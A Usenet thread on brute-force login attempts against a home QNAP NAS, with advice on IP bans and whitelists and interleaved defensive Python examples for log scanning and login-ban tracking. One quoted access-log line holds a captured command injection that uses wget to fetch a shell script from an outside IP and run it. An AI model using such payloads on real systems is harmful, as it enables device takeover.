IP Ban List forever?

A little OT...

I recently installed a QNAP TVS-673e (8gb) for a special project upcoming.

Anyway, I'm fairly new to NAS systems generally, but managed to get this one up and running without too much trouble.

My question is: I'm seeing a half-dozen or so security events every week or so. Usually from Chinese IP addresses (if you believe those online look-up tools?)

I've set the NAS to "ban forever" any access attempts with 5 failed login attempts within 5 minutes (options are 1, 5, 10 and 30 minutes).

For IP's banned so far, they come in slightly different from each other:

112.85.42.201

112.85.42.102

112.85.42.230

42.7.27.162

42.7.27.163

etc...

So my question: Is there really some Chinese entity with nothing better to do than to continuously try to hack into my NAS?!

It's got to be random, right?

There is nothing on the NAS of any value (and practically no files at all yet). And good luck guessing my User Name and Password. At this rate, it will literally take them forever to get in.

BTW: Nice NAS. I'm impressed, even though I don't fully know how to use all of it. :)

?? (That's supposedly "Thanks" in Chinese. :)

Reply to
mpm

mpm wrote in news: snipped-for-privacy@googlegroups.com:

ABSOLUTELY!

Also true, but once they 'find' an address that corresponds to a storage device (one step away from access), they trounce it.

So what gets randomized is the source ID "appearance".

You should ban the entire range and be done with it. In fact you should ban all access and set your access up on a MAC ID basis instead of other login methods.

You can then also encrypt the drive contents/volumes themselves.

Reply to
DecadentLinuxUserNumeroUno

mpm wrote

.....

118.184.63.4 "CN" China - - [09/Sep/2018:15:27:42 +0200] "POST /wuwu11.php HTTP/1.1" 404 526 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
73.91.40.171 "US" United States - - [09/Sep/2018:15:45:03 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://94.177.216.74/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 469 "-" "Hakai/2.0"
213.222.56.130 "BG" Bulgaria - - [09/Sep/2018:16:22:32 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 479 "-" "ZmEu"
115.231.219.28 "CN" China - - [09/Sep/2018:17:02:07 +0200] "GET /manager/html HTTP/1.1" 404 473 "-" "Mozilla/3.0 (compatible; Indy Library)"
176.42.7.160 "TR" Turkey - - [09/Sep/2018:18:12:52 +0200] "\x16\x03\x01\x02" 400 506 "-" "-"

..... All day long...

It is probably kiddies running scripts. These get automatically added to the firewall and so you see them only once. To make the firewall short I have now killed most of the Afrinic (Egypt-based attacks) range, always on a different (dynamic) IP. If they cannot reach the server.. once I got contacted by some ISP they could not reach my server.... ONCE. The bad guys spoil it for the others.

Same here, normal invasion plans for the US, where I hide the plutonium, and how to beam up the Precedent, so nothing special. Do not have a NAS, just some 1TB USB disks, and run a Raspberry Pi backup server. This program detects the attacks and adds those to the firewall: http://217.120.43.67/panteltje/newsflex/download.html#ip_to_country I can make it so attacking IPs are reported to their ISP, with timestamp, but for example the US attacker is on Comcast and they are too chicken to provide a contact email address in the whois query. China does. (type whois IPaddress)

Seems they scan Usenet for IPs.

Reply to
<698839253X6D445TD
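The access-log excerpt quoted above has a fixed field layout (source IP, country code, country name, timestamp, request line, status, bytes, referer, user-agent), so the "automatically added to the firewall" step can be scripted. The following is an added example, not the poster's ip_to_country program and not anything from QNAP: it parses lines in that layout, flags the same kinds of probes the excerpt shows (scanner user-agents, requests for admin tools this host does not run, TLS handshake bytes sent to a plain-HTTP port) and tallies the flagged sources by country. The SCANNER_UAS and PROBE_PATHS lists are hypothetical choices drawn from the excerpt, and the sample lines are constructed for the example; a real deployment would hand the flagged IPs to the firewall instead of printing them.

```python
import re
from collections import Counter

# Field layout of the log excerpt quoted above: ip, country code, country name,
# timestamp, request line, status, bytes, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<cc>[A-Z]{2})" (?P<country>.+?) - - '
    r'\[(?P<ts>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# User-agent strings the quoted excerpt shows on scanner traffic (hypothetical list).
SCANNER_UAS = {"ZmEu", "Hakai/2.0"}

# Paths for software this host does not run; a request for them is a probe, not a
# visitor. Hypothetical list, chosen from the paths in the excerpt.
PROBE_PATHS = ("/phpMyAdmin/", "/manager/html", "/wuwu11.php", "/login.cgi")


def parse_line(line):
    """Split one log line into its fields; returns None for lines in another format."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def classify(entry):
    """Return a short reason if the entry looks like scanner traffic, else None."""
    req = entry["request"]
    # A TLS ClientHello (record type 0x16, version 0x03) sent to a plain-HTTP port is
    # logged as escaped bytes; no browser does that on purpose.
    if req.startswith("\\x16\\x03"):
        return "tls-on-http"
    if entry["ua"] in SCANNER_UAS:
        return "scanner-ua"
    parts = req.split(" ")
    path = parts[1] if len(parts) >= 2 else ""
    if entry["status"] in ("400", "404") and path.startswith(PROBE_PATHS):
        return "probe-path"
    return None


def find_scanners(lines):
    """Map each flagged source IP to (country code, reason); one entry per IP."""
    flagged = {}
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason and entry["ip"] not in flagged:
            flagged[entry["ip"]] = (entry["cc"], reason)
    return flagged


def count_by_country(flagged):
    """Number of flagged IPs per country code, most frequent first."""
    return Counter(cc for cc, _ in flagged.values()).most_common()


# Constructed sample: four probe lines modelled on the excerpt plus one ordinary visit
# from a documentation address (192.0.2.10) that must not be flagged.
SAMPLE_LOG = """\
118.184.63.4 "CN" China - - [09/Sep/2018:15:27:42 +0200] "POST /wuwu11.php HTTP/1.1" 404 526 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
213.222.56.130 "BG" Bulgaria - - [09/Sep/2018:16:22:32 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 479 "-" "ZmEu"
115.231.219.28 "CN" China - - [09/Sep/2018:17:02:07 +0200] "GET /manager/html HTTP/1.1" 404 473 "-" "Mozilla/3.0 (compatible; Indy Library)"
176.42.7.160 "TR" Turkey - - [09/Sep/2018:18:12:52 +0200] "\\x16\\x03\\x01\\x02" 400 506 "-" "-"
192.0.2.10 "US" United States - - [09/Sep/2018:18:20:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    hits = find_scanners(SAMPLE_LOG.splitlines())
    for ip, (cc, reason) in hits.items():
        print(f"{ip:16} {cc}  {reason}")
    print(count_by_country(hits))
```

Flagging on the first matching line per IP keeps the block list short, which is the same "you see them only once" effect the poster describes; the country tally is what makes a decision like dropping a whole registry range defensible rather than a guess.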

I think you mean 8TB. $1,000. Linux desktop. Built in 4K video card? Ummm... is this really a work project?

No. No self-respecting hacker would be caught using his own machines to port scan or attack someone else's machine. They always use a machine that was hijacked and compromised by a virus or malware. The hijacked machine does the scanning, and reports back to the mothership if it finds anything interesting. Often, it's over several hops and through multiple VPNs, making tracing the perpetrator almost impossible.

Question: If your NAS box is being attacked, what is it doing being exposed to the internet? Are you running an open ftp server or web server with port forwarding through your firewall? Bad idea unless you really need it.

I've seen sequential IP and port scans (using nmap) but usually, the scans and attacks are from international botnets that have random IP's.

IoT devices, such as NAS boxes, make tempting targets. They're basically a Linux computer and drive in a small box. If some blackmailer wants to set up your NAS box as a possible DoS (denial of service) attack platform, it can be done. I vaguely recall that a DoS attack was traced back to one manufacturer's security cameras. More mundane, someone might want your CPU cycles to do some casual bitcoin mining, send out some spam, store stuff he stole off another machine, and so on. I doubt if they care about what's on your machine, but I'm sure they'll look around for anything interesting.

The problem with IoT boxes is that the manufacturers only issue firmware updates for a limited amount of time. A few years downstream, when some "security researcher" finds some security problems in the firmware, it's too late as the product is no longer being supported by the manufacturer.

I'm envious.

--
Jeff Liebermann     jeffl@cruzio.com 
150 Felker St #D    http://www.LearnByDestroying.com 
Reply to
Jeff Liebermann

Jeff Liebermann wrote in news: snipped-for-privacy@4ax.com:

Yes, as in being attacked on other ports as well.

Reply to
DecadentLinuxUserNumeroUno

Random stupid Chinese crap. What I thought. I guess people do it because so many lazy people out there either use default passwords, or only use those requiring hardly any imagination.

The drives are encrypted, but yeah, I had to port-forward (Thanks AT&T U-Verse). :(

SSH, Telnet, FTP, SAMBA and AFP -- all OFF. Only HTTPS.

And I should have clarified: 8 GB RAM. (It comes off-the-shelf in two flavors, 4 GB and 8 GB, max it can hold is 64GB DDR4). I have it populated with QTY-(4) 4TB WD NAS drives.

Reply to
mpm

I'm pretty sure I can set it up to only allow connections from a whitelist of MAC addresses.

If so, next on my to-do list...

Reply to
mpm

I think you mean filter by IP address. Filtering by MAC addresses is useful for LAN security, limiting random wireless users and visitors from accessing the NAS box. However, since MAC addresses do NOT go through a router, it does nothing for filtering machines on the WAN (internet) side of the router. Also, for LAN filtering, MAC addresses are easily spoofed and therefore offer little protection.

How (and Why) to Change Your MAC Address on Windows, Linux, and Mac

--
Jeff Liebermann     jeffl@cruzio.com 
150 Felker St #D    http://www.LearnByDestroying.com 
Reply to
Jeff Liebermann

That'd work, but OTOH you'd get much the same effect by taking it off the internet. (This is because MAC addresses are an ethernet thing, not an internet thing.)

Reply to
Jasen Betts

What is the attack? An ssh login attempt? If so, then there's no way this is an accident. I run a web store and have all sorts of attacks. I currently have 6800 IP addresses that are on my hosts.deny list. These all got banned due to multiple failed attempts to ssh into the system. I put in the denyhosts program that tracks these failed attempts. It was VERY interesting to see that the attacks dropped enormously exactly 2 weeks after setting up denyhosts. So, they have a network of compromised machines (botnet) and probe your system to find out what your "horizon" is on ssh attempts. I guess if they see that you ban a particular IP after several failed attempts over a 2 week period, then they figure they will NEVER get in, and put out a notice somewhere on the dark web not to waste effort on your system.

I have also been pulled into a DDOS attack on the US government health coverage web site, where they spoof their IP and trick my system into sending large DNS responses to the target systems. I had to block a relatively small number of specific IPs with the firewall to cut that out. They were hitting me with several thousand DNS queries an hour and slowing down my internet service.

I have also had a problem with BaiduSpider, mostly, making an outrageous number of web page loads, and have had to block a few Chinese IPs. When 80% of my page loads are coming from ONE IP, something is definitely wrong. A web crawler has no NEED to load the same page thousands of times a day.

Jon

Reply to
Jon Elson
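mpm's NAS setting (ban after 5 failed logins within 5 minutes, optionally forever) and Jon Elson's denyhosts setup are the same mechanism: count failures per source inside a sliding window and drop the source once it crosses the threshold. The following added example, which is not code from QNAP, denyhosts or any poster in this thread, implements that counter over sshd auth-log lines and emits the result in the "daemon: address" form /etc/hosts.deny uses; ban_minutes=None reproduces the "ban forever" option, a number gives a timed ban that lapses on its own. The auth-log lines are constructed for the example (the hostname "nas", the user names and the 192.0.2.10 login are invented; the banned and not-banned sources reuse addresses from the thread).

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Shape of an OpenSSH password-auth line in a syslog-style auth log (constructed sample
# below; real files also carry many other message types, which parse_auth_line skips).
AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?\S+ "
    r"from (?P<ip>\S+) port \d+"
)


def ts(text, year=2018):
    """Syslog timestamps carry no year, so the caller supplies one."""
    return datetime.strptime(text, "%b %d %H:%M:%S").replace(year=year)


class LoginBanTracker:
    """Ban a source after max_failures failed logins inside a sliding window."""

    def __init__(self, max_failures=5, window_minutes=5, ban_minutes=None):
        self.max_failures = max_failures
        self.window = timedelta(minutes=window_minutes)
        # None means "ban forever", as in the NAS option discussed in the thread.
        self.ban_duration = None if ban_minutes is None else timedelta(minutes=ban_minutes)
        self._failures = defaultdict(deque)   # ip -> timestamps of recent failures
        self._bans = {}                       # ip -> expiry datetime, or None if permanent

    def is_banned(self, ip, now):
        if ip not in self._bans:
            return False
        expiry = self._bans[ip]
        if expiry is None or now < expiry:
            return True
        del self._bans[ip]                    # timed ban has lapsed
        return False

    def record_failure(self, ip, now):
        """Register one failed login; returns True if this failure tripped the ban."""
        if self.is_banned(ip, now):
            return False
        recent = self._failures[ip]
        recent.append(now)
        while recent and now - recent[0] > self.window:
            recent.popleft()                  # forget failures older than the window
        if len(recent) >= self.max_failures:
            self._bans[ip] = None if self.ban_duration is None else now + self.ban_duration
            recent.clear()
            return True
        return False

    def record_success(self, ip):
        self._failures.pop(ip, None)

    def hosts_deny_lines(self, service="sshd"):
        """Current bans in the 'daemon: address' form used by /etc/hosts.deny."""
        return [f"{service}: {ip}" for ip in sorted(self._bans)]


def parse_auth_line(line, year=2018):
    m = AUTH_RE.match(line)
    if not m:
        return None
    return ts(m["ts"], year), m["outcome"], m["ip"]


def replay(lines, tracker, year=2018):
    """Feed auth-log lines through the tracker; returns (ip, time) for each new ban."""
    bans = []
    for line in lines:
        parsed = parse_auth_line(line, year)
        if parsed is None:
            continue
        when, outcome, ip = parsed
        if outcome == "Failed":
            if tracker.record_failure(ip, when):
                bans.append((ip, when))
        else:
            tracker.record_success(ip)
    return bans


# Constructed sample: 112.85.42.201 fails five times in 13 seconds (banned);
# 42.7.27.162 fails five times but 3 minutes apart, never 5 inside any 5-minute window.
SAMPLE_AUTH_LOG = """\
Sep 09 15:27:42 nas sshd[1101]: Failed password for invalid user admin from 112.85.42.201 port 55012 ssh2
Sep 09 15:27:45 nas sshd[1102]: Failed password for invalid user admin from 112.85.42.201 port 55013 ssh2
Sep 09 15:27:49 nas sshd[1103]: Failed password for root from 112.85.42.201 port 55014 ssh2
Sep 09 15:27:52 nas sshd[1104]: Failed password for root from 112.85.42.201 port 55015 ssh2
Sep 09 15:27:55 nas sshd[1105]: Failed password for invalid user test from 112.85.42.201 port 55016 ssh2
Sep 09 15:30:00 nas sshd[1110]: Failed password for invalid user admin from 42.7.27.162 port 40001 ssh2
Sep 09 15:33:00 nas sshd[1111]: Failed password for invalid user admin from 42.7.27.162 port 40002 ssh2
Sep 09 15:36:00 nas sshd[1112]: Failed password for invalid user admin from 42.7.27.162 port 40003 ssh2
Sep 09 15:39:00 nas sshd[1113]: Failed password for invalid user admin from 42.7.27.162 port 40004 ssh2
Sep 09 15:42:00 nas sshd[1114]: Failed password for invalid user admin from 42.7.27.162 port 40005 ssh2
Sep 09 15:45:00 nas sshd[1120]: Accepted password for mpm from 192.0.2.10 port 50100 ssh2
"""

if __name__ == "__main__":
    tracker = LoginBanTracker()
    for ip, when in replay(SAMPLE_AUTH_LOG.splitlines(), tracker):
        print(f"banned {ip} at {when}")
    print("\n".join(tracker.hosts_deny_lines()))
```

The slow source in the sample is the case the window choice decides: at five failures every three minutes it never trips a 5-in-5-minutes rule, while the 30-minute window the NAS also offers would catch it. A longer window costs nothing against real users, who rarely fail five times, so the wider setting is usually the better default.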

Yes, the IP whitelist will make the node totally disappear except to the whitelisted users. If this system is only to be available to prearranged users, this is the best way to solve the issue.

The MAC whitelist is just a bit more complicated, as you need to find out the MAC address of each approved user, and then if they need to access from a different machine, you have to enter that in your firewall.

Jon

Reply to
Jon Elson

MAC addresses may be easily spoofed, BUT, if you have NO IDEA what a very SMALL list of approved addresses are, the search space is RATHER large, in fact bigger than the range of IPV4 addresses. That would take somebody a LONG time to figure out. And, with the machine not responding AT ALL to any unapproved access, they won't even know it exists.

But, that will be true of an IP whitelist, too.

Jon

Reply to
Jon Elson
